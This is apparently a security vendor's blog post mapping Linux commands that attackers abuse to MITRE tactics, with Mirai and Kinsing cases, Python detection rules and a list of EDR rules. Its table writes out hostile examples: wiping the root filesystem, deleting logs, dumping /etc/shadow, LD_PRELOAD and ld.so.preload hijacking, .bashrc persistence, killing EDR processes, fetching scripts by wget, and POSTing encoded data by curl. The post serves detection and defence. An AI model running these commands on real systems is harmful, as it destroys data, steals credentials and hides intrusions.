    May 7, 2021

    Linux Commands and Utilities Commonly Used by Attackers

    Uptycs' threat research team has observed several instances of Linux malware in which the attackers leverage built-in commands and utilities for a wide range of malicious activities.
    In this post, we'll take a look at the Linux commands and utilities commonly used by attackers and at how you can use Uptycs EDR detection capabilities to find out whether they have been used in your environment.

    Background

    In Linux, many utilities and commands are present by default. Once an adversary gains access to a system, they can leverage these commands and utilities to get their malware loaded and running quickly with full system privileges. And because users run these same commands every day, malicious use of them can be extremely difficult to detect.
    Using customer telemetry, MITRE mapping of detection alerts, threat intelligence systems and our in-house osquery-based sandbox as data sources, we identified around 25 commands and utilities that are most commonly used by attackers.

    Uptycs EDR has detected and identified malware abusing these commands and utilities under the following MITRE tactics:

    1. Command and Control
    2. Persistence
    3. Privilege Escalation
    4. Defense Evasion
    5. Discovery

    We drill down and take a closer look at a few examples in the table below.

    Linux commands and utilities used by attackers

    Using Uptycs EDR, we discovered the Linux commands most commonly used by attackers and mapped them to the techniques and tactics used by bad actors. Below is a list of commonly exploited commands and utilities.

    | Command / Utility | Techniques | Tactics | Example |
    | --- | --- | --- | --- |
    | arp | Remote System Discovery | Discovery | arp -a |
    | users | System Owner/User Discovery | Discovery | users |
    | netstat | System Network Connections Discovery Linux | Discovery | netstat -plntu |
    | uname | List OS Information | Discovery | uname -a |
    | groups | Enumerate users and groups | Discovery | groups |
    | tcpdump | Packet Capture Linux | Discovery | tcpdump -n > output |
    | LD_PRELOAD=#{path_to_shared_library} ls | Shared Library Injection via LD_PRELOAD | Persistence, Privilege Escalation, Defense Evasion | LD_PRELOAD="/tmp/wqs.so" /bin/ls |
    | insmod | Loadable Kernel Module based Rootkit | Persistence | sudo insmod rootkit.ko |
    | modprobe | Loadable Kernel Module based Rootkit | Persistence | sudo modprobe -r rootkit.ko |
    | useradd | Create a user account on a Linux System | Persistence | useradd -g 500 -u 500 -s /usr/local/bin/nocando -d /var/spool/vmail |
    | crontab | Schedule task/Job using cron | Persistence | crontab - |
    | rm | Delete Filesystem - Linux; Delete Log Files | Impact | rm -rf / --no-preserve-root; rm -rf /var/logs |
    | kill/pkill | Kill EDR processes | Impact | kill -9 1234 |
    | lsmod | Linux VM Check via Kernel Modules | Defense Evasion | sudo lsmod \| grep -i "vboxsf\|vboxguest" |
    | systemctl | Stop EDR services on Linux | Defense Evasion | systemctl stop daemon |
    | curl | Malicious User Agents | Command and Control | curl -XPOST #{base64_data}.#{destination_url} |
    | wget | Ingress Tool Transfer | Command and Control | wget http://{IP}:1337/file.sh |
    | chattr | File attributes/permissions modification | Defense Evasion | chattr -i /etc/ld.so.preload |
    | /etc/shadow | Access /etc/shadow (Local) | Persistence, Credential Access | sudo cat /etc/shadow > file |
    | /etc/passwd | Access /etc/passwd (Local); Enumerate all accounts | Persistence | cat /etc/passwd > file |
    | ~/.bash_history | Clear Bash history; Access Bash history | Credential Access, Defense Evasion | echo "" > ~/.bash_history |
    | /etc/sudoers | View sudoers access | Privilege Escalation | vim /etc/sudoers |
    | ~/.bashrc | .bash_profile and .bashrc | Persistence | echo "/tmp/qwer" >> ~/.bashrc |
    | ~/.bash_profile | .bash_profile and .bashrc | Persistence | echo "/tmp/qwer" >> ~/.bash_profile |
    | /etc/ld.so.preload | Hijack Execution Flow | Persistence, Privilege Escalation, Defense Evasion | echo "/tmp/a.so" >> /etc/ld.so.preload |

    Table: Commonly exploited Linux commands/utilities
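As an added illustration of how rows of the table translate into detection logic (example code written for this article, not Uptycs' own rules or event schema), the Python below matches a few of the entries above against constructed process-event records; the record format, the sample command lines and the rule names are assumptions, while the technique ids are the ones cited in the event-rule list at the end of this post.

```python
import os
import shlex

# Constructed sample process events (hypothetical record shape, not Uptycs' schema).
SAMPLE_EVENTS = [
    {"pid": 101, "cmdline": "LD_PRELOAD=/tmp/wqs.so /bin/ls"},
    {"pid": 102, "cmdline": "wget http://203.0.113.5:1337/file.sh -O /tmp/file.sh"},
    {"pid": 103, "cmdline": "chattr -i /etc/ld.so.preload"},
    {"pid": 104, "cmdline": "sh -c 'echo /tmp/a.so >> /etc/ld.so.preload'"},
    {"pid": 106, "cmdline": "rm -rf /var/log"},
]

def unwrap(cmdline):
    """Split a command line into (env assignments, argv), unwrapping sh -c '...' wrappers."""
    argv = shlex.split(cmdline)
    env = {}
    while argv and "=" in argv[0] and not argv[0].startswith("-"):  # leading VAR=value
        env.update([argv.pop(0).split("=", 1)])
    if len(argv) >= 3 and os.path.basename(argv[0]) in ("sh", "bash") and argv[1] == "-c":
        inner_env, argv = unwrap(argv[2])
        env.update(inner_env)
    return env, argv

def tool(argv):
    return os.path.basename(argv[0]) if argv else ""

def rm_is_destructive(argv):
    # both -r and -f (short options only) against / or anything under /var/log
    flags = "".join(a[1:] for a in argv[1:] if a.startswith("-") and not a.startswith("--"))
    targets = [a for a in argv[1:] if not a.startswith("-")]
    return "r" in flags and "f" in flags and any(t == "/" or t.startswith("/var/log") for t in targets)

# (rule name, technique id as cited in the event-rule list, predicate over env, argv, raw cmdline)
RULES = [
    ("Detected use of LD_PRELOAD - Likely code injection", "T1574.006",
     lambda env, argv, raw: "LD_PRELOAD" in env),
    ("Process trying to access /etc/ld.so.preload", "T1055.001",
     lambda env, argv, raw: "/etc/ld.so.preload" in raw),
    ("wget/curl downloading a file into the tmp directory", "T1105",
     lambda env, argv, raw: tool(argv) in ("wget", "curl") and "/tmp/" in raw),
    ("Data deletion using rm -rf", "T1485",
     lambda env, argv, raw: tool(argv) == "rm" and rm_is_destructive(argv)),
]

def detect(cmdline):
    """Return the technique ids of every rule that matches one command line."""
    env, argv = unwrap(cmdline)
    return [tid for _, tid, pred in RULES if pred(env, argv, cmdline)]

def scan(events):  # pid -> technique ids, for the events that matched anything
    return {e["pid"]: hits for e in events if (hits := detect(e["cmdline"]))}
```

Note that the LD_PRELOAD rule keys on the environment assignment rather than on the string appearing anywhere, so a benign `grep LD_PRELOAD` does not fire, and the `rm` rule ignores long options so `--no-preserve-root` neither hides nor triggers the match on its own.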

    Malware Tactics Using Linux Commands

    Here’s a closer look at some of the most recent and commonly seen malware using the above commands and utilities.

    Tactic: CnC and Execution

    Malware: Mirai

    Usage: wget and curl are the commands most widely seen downloading and executing further pieces of malware.

    Mirai is malware that turns networked devices running Linux into remotely controlled bots that can be used as part of a botnet in large-scale network attacks. In the attack kill chain, the adversary downloads an initial shell script onto the target system, which then runs wget and curl to drop the Mirai binaries for different architectures and executes them. (See Figure 1.)

    Figure 1: Mirai malware executing wget and curl activities.

    Uptycs EDR detected the curl and wget activity performed by the malware as well as Mirai's own process activity. (See Figure 2.)

    Figure 2: Uptycs detection for wget and curl activities by Mirai.

    Tactic: Persistence, Defense Evasion

    Malware: Kinsing

    Usage: For persistence and defense evasion, we have seen the operators of Kinsing abusing commands like crontab, chattr and rm and modifying files such as ~/.bash_history and /etc/ld.so.preload.

    Kinsing is malware that targets misconfigured Docker services and infects them to run crypto miners. In its initial phase the malware downloads and executes a shell script, which modifies /etc/ld.so.preload and also runs crontab to achieve persistence. (See Figures 3 and 4.)

    Figure 3: Kinsing modifying /etc/ld.so.preload.

    Figure 4: Kinsing adding a cron job for persistence.

    Uptycs EDR detected the Kinsing malware executing the crontab and chattr commands for persistence and defense evasion. (See Figure 5.)

    Figure 5: Uptycs detection for Kinsing malware.

    In addition to detecting the Linux commands and utilities used by Mirai and Kinsing, Uptycs EDR also labelled the threat through process scanning with a 10/10 risk score.

    Tactic: Discovery

    Most Linux servers host services and are administered over SSH. If SSH is not configured properly, adversaries may gain access to the server using techniques such as exploiting weak credentials. Once they have access to the target system, their initial goal is to extract system information for later stages such as exploitation, privilege escalation or persistence. Commands like uname, users, groups and netstat are the ones most commonly used for this initial reconnaissance.

    Uptycs EDR detects the post-login activity that follows a successful SSH login on our target system. (See Figure 6.)

    Figure 6: Uptycs detection for discovery techniques.
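The session-scoped correlation described above, as an added example that is not Uptycs' code: constructed SSH-session events are grouped per session and flagged only when several different discovery tools run within a short window, so a single uname by an administrator does not alert. The session ids, timestamps, window and threshold are assumptions.

```python
import os
import shlex
from collections import defaultdict

WINDOW_SECONDS = 120     # how close together the discovery commands must be
MIN_DISTINCT_TOOLS = 3   # how many different discovery tools count as a burst
# Discovery commands taken from the table and the event-rule list on this page.
DISCOVERY_TOOLS = {"arp", "ifconfig", "ip", "who", "users", "groups", "uname", "netstat"}

# Constructed sample: (timestamp in seconds, SSH session id, command line).
SAMPLE_EVENTS = [
    (1000, "ssh-41", "uname -a"),
    (1004, "ssh-41", "users"),
    (1009, "ssh-41", "groups"),
    (1015, "ssh-41", "netstat -plntu"),
    (1020, "ssh-41", "arp -a"),
    (1002, "ssh-42", "uname -a"),                  # an admin: one check, then real work
    (1900, "ssh-42", "vim /etc/nginx/nginx.conf"),
    (2500, "ssh-42", "netstat -plntu"),
]

def tool_name(cmdline):
    """Basename of the program run, skipping leading VAR=value assignments."""
    argv = shlex.split(cmdline)
    while argv and "=" in argv[0] and not argv[0].startswith("-"):
        argv.pop(0)
    return os.path.basename(argv[0]) if argv else ""

def discovery_bursts(events):
    """Return {session: sorted discovery tools} for every SSH session in which at least
    MIN_DISTINCT_TOOLS different discovery commands ran within WINDOW_SECONDS."""
    per_session = defaultdict(list)
    for ts, session, cmdline in events:
        name = tool_name(cmdline)
        if name in DISCOVERY_TOOLS:
            per_session[session].append((ts, name))
    alerts = {}
    for session, hits in per_session.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):          # slide a window from each hit
            window = {name for ts, name in hits[i:] if ts - start <= WINDOW_SECONDS}
            if len(window) >= MIN_DISTINCT_TOOLS:
                alerts[session] = sorted(window)
                break
    return alerts
```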

    Conclusion

    Because these Linux commands are used in daily operations, their use for malicious activity often goes unnoticed and stays under the radar. Linux enterprise administrators should regularly monitor the commands in the list above for suspicious or malicious activity on their systems. Current Uptycs customers can see a full list of event rules below.


    Event Rules for Uptycs Customers

    The following Uptycs EDR rules are already available to customers to detect the techniques mentioned above:

    • Process using ifconfig, ip or arp to get the network configuration - T1016 Discovery under Discovery for Linux
    • Process using who or users utility to get users information - T1033 Discovery under Discovery for Linux
    • Suspicious tool tcpdump launched to capture network traffic - T1040 Discovery for Linux
    • Detected use of curl utility to download file from internet - T1105 Command and Control for Linux
    • Process using groups utility to get group policies - T1069.002 Discovery for Linux
    • Process or script trying to get system information - T1082 System Information Discovery under Discovery for Linux
    • Useradd utility launched to create user account - T1136 Persistence for Linux
    • Detected use of LD_PRELOAD - Likely code injection - T1574.006 Hijack Execution for Linux
    • Scheduled Task by Cron - T1053.003 Persistence_LINUX
    • Process trying to access /etc/ld.so.preload file for persistence - T1055.001 Defense Evasion for Linux
    • Suspicious use of wget to download file in tmp directory - T1105 Command and Control for Linux
    • Process trying to access or modify OS credentials - T1003.008 Credential Access Linux
    • Process trying to access bash history - T1552.003 Credential Access for Linux
    • .bash_profile or .bashrc file modification - T1156.004 Persistence for Linux
    • Create or Modify Systemd Service- T1543.002 Persistence_LINUX
    • Data deletion using rm -rf detected - T1485 Impact for Linux
    • Process trying to access /etc/passwd file - T1087.001 Discovery for Linux
    • Process trying to access /etc/sudoers file - T1548.003 Privilege Escalation for Linux
    • Process using crontab utility to add entries in cron jobs - T1053.003 Execution for Linux

    Pritam Salunkhe

    Pritam Salunkhe works as a Security Researcher at Uptycs. His expertise is in malware analysis and reverse engineering. He has a keen interest in programming and in building tools for defensive purposes.
